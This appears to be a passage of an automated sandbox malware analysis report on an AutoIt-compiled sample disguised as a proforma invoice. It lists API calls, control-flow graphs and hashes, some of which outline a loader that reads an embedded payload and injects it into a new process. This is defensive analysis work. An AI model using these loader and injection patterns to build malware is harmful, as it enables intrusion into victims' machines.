• Instruction Fuzzy Hash: 4471BF715293019EC701EF65EC829ABBBECFF89350F40892EF845831A0DB719969CF56

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 760 253633-253681 762 2536e1-2536e3 760->762 763 253683-253686 760->763 762->763 764 2536e5 762->764 765 2536e7 763->765 766 253688-25368f 763->766 767 2536ca-2536d2 DefWindowProcW 764->767 768 28d0cc-28d0fa call 261070 call 261093 765->768 769 2536ed-2536f0 765->769 770 253695-25369a 766->770 771 25374b-253753 PostQuitMessage 766->771 775 2536d8-2536de 767->775 803 28d0ff-28d106 768->803 776 253715-25373c SetTimer RegisterWindowMessageW 769->776 777 2536f2-2536f3 769->777 772 2536a0-2536a2 770->772 773 28d154-28d168 call 2b2527 770->773 774 253711-253713 771->774 780 253755-253764 call 2544a0 772->780 781 2536a8-2536ad 772->781 773->774 797 28d16e 773->797 774->775 776->774 782 25373e-253749 CreatePopupMenu 776->782 784 28d06f-28d072 777->784 785 2536f9-25370c KillTimer call 25443a call 253114 777->785 780->774 787 28d139-28d140 781->787 788 2536b3-2536b8 781->788 782->774 791 28d0a8-28d0c7 MoveWindow 784->791 792 28d074-28d076 784->792 785->774 787->767 802 28d146-28d14f call 2a7c36 787->802 795 2536be-2536c4 788->795 796 28d124-28d134 call 2b2d36 788->796 791->774 799 28d078-28d07b 792->799 800 28d097-28d0a3 SetFocus 792->800 795->767 795->803 796->774 797->767 799->795 804 28d081-28d092 call 261070 799->804 800->774 802->767 803->767 809 28d10c-28d11f call 25443a call 25434a 803->809 804->774 809->767
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 002536D2
• KillTimer.USER32(?,00000001), ref: 002536FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0025371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025372A
• CreatePopupMenu.USER32 ref: 0025373E
• PostQuitMessage.USER32(00000000), ref: 0025374D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated$%.
• API String ID: 129472671-2498375929
• Opcode ID: e90a74b00f34e45c82eae8cebe23be96c396b3bc1d29bff68b4d45c615e9bae9
• Instruction ID: ccd9b41c50be9d05bc60da75f55283ced01d090ed2d0e748673aeeaa4f5cfd5b
• Opcode Fuzzy Hash: e90a74b00f34e45c82eae8cebe23be96c396b3bc1d29bff68b4d45c615e9bae9
• Instruction Fuzzy Hash: B2414876630506EBDB15AF64EC09BF97798EB48382F141429FD02822E1CAB09D79972D

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00253A50
• LoadCursorW.USER32(00000000,00007F00), ref: 00253A5F
• LoadIconW.USER32(00000063), ref: 00253A76
• LoadIconW.USER32(000000A4), ref: 00253A88
• LoadIconW.USER32(000000A2), ref: 00253A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00253AC0
• RegisterClassExW.USER32(?), ref: 00253B16
  • Part of subcall function 00253041: GetSysColorBrush.USER32(0000000F), ref: 00253074
  • Part of subcall function 00253041: RegisterClassExW.USER32(00000030), ref: 0025309E
  • Part of subcall function 00253041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
  • Part of subcall function 00253041: InitCommonControlsEx.COMCTL32(?), ref: 002530CC
  • Part of subcall function 00253041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
  • Part of subcall function 00253041: LoadIconW.USER32(000000A9), ref: 002530F2
  • Part of subcall function 00253041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 04c250dcfa9cbe11fff4da8e9b41828b702cd821da03b2fbd58cc22a2f613498
• Instruction ID: 908512b8c2428dc11aedf9b915db45b617cead640178d12143ccbab4c76231f2
• Opcode Fuzzy Hash: 04c250dcfa9cbe11fff4da8e9b41828b702cd821da03b2fbd58cc22a2f613498
• Instruction Fuzzy Hash: 1B213C72D11304EFEB12DFA4ED09BDD7BB8EB4C711F00851AF500A62A1D3B65A558F88

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R1
• API String ID: 1825951767-3288481718
• Opcode ID: a8be99c7fe1b66c0087ba163f41e94ccf671039affcbb20f9329a7af193115cc
• Instruction ID: ee47cf20cb91dda4a313464fcf6954623b1171cd3d2e2ec2758cd0dfd8d2f6cb
• Opcode Fuzzy Hash: a8be99c7fe1b66c0087ba163f41e94ccf671039affcbb20f9329a7af193115cc
• Instruction Fuzzy Hash: 75A17F7292022DDACB05EBA0DC56AEEB778BF15341F40042AF816B7191DF745A2DCFA4

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00270193
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0027019B
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002701A6
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002701B1
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(00000011,00000000), ref: 002701B9
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(00000012,00000000), ref: 002701C1
                                                                                                                      • Part of subcall function 002660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0025F930), ref: 00266154
                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0025F9CD
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0025FA4A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002945C8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID: <W1$\T1$%.$S1
                                                                                                                    • API String ID: 1986988660-287808681
                                                                                                                    • Opcode ID: d66eee8cfc9e2c0a3784afe1afb974d1d99f9cddc3f9800617858f9f67568fcb
                                                                                                                    • Instruction ID: db567bb9ecf8688808c77e944396fc053d8d7f8d5fe4ae21161e44e6ba317a09
                                                                                                                    • Opcode Fuzzy Hash: d66eee8cfc9e2c0a3784afe1afb974d1d99f9cddc3f9800617858f9f67568fcb
                                                                                                                    • Instruction Fuzzy Hash: 5081BBB4921A40CFD386DF2AE9856D87BEDFBDC306B90C52AD419CB2A1EB704494CF15

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 983 c524a8-c52556 call c4fec8 986 c5255d-c52583 call c533b8 CreateFileW 983->986 989 c52585 986->989 990 c5258a-c5259a 986->990 991 c526d5-c526d9 989->991 995 c525a1-c525bb VirtualAlloc 990->995 996 c5259c 990->996 993 c5271b-c5271e 991->993 994 c526db-c526df 991->994 997 c52721-c52728 993->997 998 c526e1-c526e4 994->998 999 c526eb-c526ef 994->999 1002 c525c2-c525d9 ReadFile 995->1002 1003 c525bd 995->1003 996->991 1004 c5277d-c52792 997->1004 1005 c5272a-c52735 997->1005 998->999 1000 c526f1-c526fb 999->1000 1001 c526ff-c52703 999->1001 1000->1001 1008 c52705-c5270f 1001->1008 1009 c52713 1001->1009 1010 c525e0-c52620 VirtualAlloc 1002->1010 1011 c525db 1002->1011 1003->991 1006 c52794-c5279f VirtualFree 1004->1006 1007 c527a2-c527aa 1004->1007 1012 c52737 1005->1012 1013 c52739-c52745 1005->1013 1006->1007 1008->1009 1009->993 1014 c52627-c52642 call c53608 1010->1014 1015 c52622 1010->1015 1011->991 1012->1004 1016 c52747-c52757 1013->1016 1017 c52759-c52765 1013->1017 1023 c5264d-c52657 1014->1023 1015->991 1021 c5277b 1016->1021 1018 c52767-c52770 1017->1018 1019 c52772-c52778 1017->1019 1018->1021 1019->1021 1021->997 1024 c52659-c52688 call c53608 1023->1024 1025 c5268a-c5269e call c53418 1023->1025 1024->1023 1031 c526a0 1025->1031 1032 c526a2-c526a6 1025->1032 1031->991 1033 c526b2-c526b6 1032->1033 1034 c526a8-c526ac CloseHandle 1032->1034 1035 c526c6-c526cf 1033->1035 1036 c526b8-c526c3 VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00C52579
                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C5279F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 204039940-0
                                                                                                                    • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                    • Instruction ID: 0b61edbc67c3c34842c69dcf07c73b9c4c206ebae01dd3dc985037c7bc09bd41
                                                                                                                    • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                    • Instruction Fuzzy Hash: 8AA14B78E00208EBDB14CFA4C895BEEB7B5FF49305F208159E911BB280DB759A85CF58

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1114 2539d5-253a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00253A03
                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00253A24
                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00253A38
                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00253A41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateShow
                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                    • Opcode ID: ec5f932ddc784bffb54df2ffa27b67b4fc278055e55fa15f1a5eba627aa7a981
                                                                                                                    • Instruction ID: a168245b292067db31407b14037ce5843778e3f6dd61c57981f888eb890cd4ce
                                                                                                                    • Opcode Fuzzy Hash: ec5f932ddc784bffb54df2ffa27b67b4fc278055e55fa15f1a5eba627aa7a981
                                                                                                                    • Instruction Fuzzy Hash: 78F03072901290BEEA325713AC0CEA72E7DD7CAF50F00842AB900A2170C1710C12CA74

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1467 c52278-c523a8 call c4fec8 call c52168 CreateFileW 1474 c523af-c523bf 1467->1474 1475 c523aa 1467->1475 1478 c523c6-c523e0 VirtualAlloc 1474->1478 1479 c523c1 1474->1479 1476 c5245f-c52464 1475->1476 1480 c523e4-c523fb ReadFile 1478->1480 1481 c523e2 1478->1481 1479->1476 1482 c523fd 1480->1482 1483 c523ff-c52439 call c521a8 call c51168 1480->1483 1481->1476 1482->1476 1488 c52455-c5245d ExitProcess 1483->1488 1489 c5243b-c52450 call c521f8 1483->1489 1488->1476 1489->1488
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00C52168: Sleep.KERNELBASE(000001F4), ref: 00C52179
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C5239E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileSleep
                                                                                                                    • String ID: 54JFAO2AFVHAVQ6
                                                                                                                    • API String ID: 2694422964-3985550941
                                                                                                                    • Opcode ID: 531bf96853bf20093c253a173b7696cc66fd8ccfb50915cb452cfa436705af3e
                                                                                                                    • Instruction ID: 92270c1f23d4ce3c643ba7115418f9bcfa5b81f5492308ddf96afd605b2ccc11
                                                                                                                    • Opcode Fuzzy Hash: 531bf96853bf20093c253a173b7696cc66fd8ccfb50915cb452cfa436705af3e
                                                                                                                    • Instruction Fuzzy Hash: 16519434E04249EBEF11DBA4C855BEEBBB9AF15301F004199E704BB2C1D7790B49CB66

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1491 25407c-254092 1492 25416f-254173 1491->1492 1493 254098-2540ad call 257a16 1491->1493 1496 28d3c8-28d3d7 LoadStringW 1493->1496 1497 2540b3-2540d3 call 257bcc 1493->1497 1500 28d3e2-28d3fa call 257b2e call 256fe3 1496->1500 1497->1500 1501 2540d9-2540dd 1497->1501 1510 2540ed-25416a call 272de0 call 25454e call 272dbc Shell_NotifyIconW call 255904 1500->1510 1513 28d400-28d41e call 257cab call 256fe3 call 257cab 1500->1513 1503 254174-25417d call 258047 1501->1503 1504 2540e3-2540e8 call 257b2e 1501->1504 1503->1510 1504->1510 1510->1492 1513->1510
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0028D3D7
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • _memset.LIBCMT ref: 002540FC
                                                                                                                    • _wcscpy.LIBCMT ref: 00254150
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00254160
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3942752672-1585850449
                                                                                                                    • Opcode ID: a95ae6c7f1456821bd14435ec1a6706281193bd82d1a0ad495ad30536dbe210d
                                                                                                                    • Instruction ID: d71e7d7071922123dba66009739b986eaf4e78f8e4c7f68d456b7d842892843f
                                                                                                                    • Opcode Fuzzy Hash: a95ae6c7f1456821bd14435ec1a6706281193bd82d1a0ad495ad30536dbe210d
                                                                                                                    • Instruction Fuzzy Hash: 8E31E6720287019BD325EF60EC45FDB77DCAF54305F10491AF985920D1DB7096ADCB8A
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E0F
                                                                                                                    • _free.LIBCMT ref: 0028E263
                                                                                                                    • _free.LIBCMT ref: 0028E2AA
                                                                                                                      • Part of subcall function 00256A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00256BAD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                    • API String ID: 2861923089-1757145024
                                                                                                                    • Opcode ID: 9a9345c237eb87c9ef315cdb5dd55b0e47854ce9fa48ad49ffd7113a9a8682e3
                                                                                                                    • Instruction ID: 59d63a66c3f923265a354729697094777cd414d21b8c06ed26f53f8b3dcdecb1
                                                                                                                    • Opcode Fuzzy Hash: 9a9345c237eb87c9ef315cdb5dd55b0e47854ce9fa48ad49ffd7113a9a8682e3
                                                                                                                    • Instruction Fuzzy Hash: 6C919E719212199FCF04EFA4CC919EDB7B8FF09310B04446AF815AB2A1DB70AD69CF54
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002535A1,SwapMouseButtons,00000004,?), ref: 002535D4
                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002535A1,SwapMouseButtons,00000004,?,?,?,?,00252754), ref: 002535F5
                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,002535A1,SwapMouseButtons,00000004,?,?,?,?,00252754), ref: 00253617
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                    • Opcode ID: 20d02c0009e48378c3b0d77738316feddcfc5f0ae7e8a3b24f1677bb022afdd0
                                                                                                                    • Instruction ID: 31cec260d37ed567aef6a01631f15da5a0f4ab2ab1e5251848f3776cd14cb6f2
                                                                                                                    • Opcode Fuzzy Hash: 20d02c0009e48378c3b0d77738316feddcfc5f0ae7e8a3b24f1677bb022afdd0
                                                                                                                    • Instruction Fuzzy Hash: 45115A71921209BFDB20CF64EC44EAEB7BCEF04781F00946AF805D7210D2719F649768
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00C51923
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C519B9
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C519DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2438371351-0
                                                                                                                    • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                                                    • Instruction ID: 6064949b0b59360dde01e5fa1e039b57817afe970b38d1ed86e236b11f07014f
                                                                                                                    • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                                                    • Instruction Fuzzy Hash: 61623A34A14258DBEB24CFA4C844BDEB372EF58301F1091A9D51DEB390E77A9E84CB59
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254EE5: _fseek.LIBCMT ref: 00254EFD
                                                                                                                      • Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9824
                                                                                                                      • Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9837
                                                                                                                    • _free.LIBCMT ref: 002B96A2
                                                                                                                    • _free.LIBCMT ref: 002B96A9
                                                                                                                    • _free.LIBCMT ref: 002B9714
                                                                                                                      • Part of subcall function 00272D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00279A24), ref: 00272D69
                                                                                                                      • Part of subcall function 00272D55: GetLastError.KERNEL32(00000000,?,00279A24), ref: 00272D7B
                                                                                                                    • _free.LIBCMT ref: 002B971C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1552873950-0
                                                                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                    • Instruction ID: 054f0e78a23ec8a5fe8dfe8a0e9002e7cdb4f2f3449484dda65fdb6d8432d175
                                                                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                    • Instruction Fuzzy Hash: 03514FB1914218ABDF249F64CC85AEEBBB9EF48304F10449EF60DA3241DB715A95CF58
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2782032738-0
                                                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction ID: 923f77ffb82aef8f069fa0ab8e4ab8b87688ef1235873bb1ea986acc6401e8f4
                                                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction Fuzzy Hash: 8241D675A2074A9BDB1CEE69CC809AEB7A6EF46364B24C13DE81DCB640D770DD608B41
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
